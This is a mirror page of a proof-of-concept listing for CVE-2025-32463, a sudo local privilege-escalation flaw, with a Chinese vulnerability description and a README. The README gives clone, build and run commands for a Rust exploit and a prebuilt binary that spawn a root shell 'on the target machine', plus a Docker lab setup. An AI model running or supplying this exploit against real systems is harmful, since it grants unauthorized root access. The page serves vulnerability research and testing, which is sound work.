Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-32463 PoC — Sudo 安全漏洞

Source
Associated Vulnerability
Title:Sudo 安全漏洞 (CVE-2025-32463)
Description:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞,该漏洞源于使用用户控制目录中的/etc/nsswitch.conf可能导致获取root访问权限。
Readme
# CVE-2025-32463 Sudo EoP Exploit PoC (Rust)

## Using Prebuild Binary

### 1. Clone the repository and run the binary in the target machine.

```bash
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git

cd CVE-2025-32463-Chwoot-POC

./exploit

```


## Build From Source

### 1. Clone the repository (if not done already)

```bash
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
````

### 2. Build the Rust binary in release mode

```bash
cargo build --release
```

The compiled binary will be located at:

```bash
./target/release/CVE-2025-32463-Chwoot-POC
```

---

## Usage

Run the exploit binary with optional command arguments:

* To spawn an interactive root shell:

```bash
sudo ./target/release/CVE-2025-32463-Chwoot-POC
```

* To run a specific command as root (for example, `id`):

```bash
sudo ./target/release/CVE-2025-32463-Chwoot-POC "id"
```

---

## Docker Usage

Alternatively, use the provided Docker container for an isolated vulnerable environment with all dependencies installed.
1. Build the Docker image

```bash
docker build -t sudo-chwoot .
```

2. Run the container interactively (if it didnt work , then try using the image id instead of sudo-chwoot. You can get thata using `sudo docker images`)

```bash
docker run --rm -it --privileged sudo-chwoot 
```
3. Inside the container, run the exploit

```bash
cd /home/pwn/CVE-2025-32463-Rust-POC
./target/release/CVE-2025-32463-Chwoot-POC
```
File Snapshot

[4.0K] /data/pocs/f30da8855480a95f265615972570afeb17cd4a5f ├── [7.6K] Cargo.lock ├── [ 116] Cargo.toml ├── [ 810] Dockerfile ├── [533K] exploit ├── [1.5K] README.md └── [4.0K] src └── [1.7K] main.rs 1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.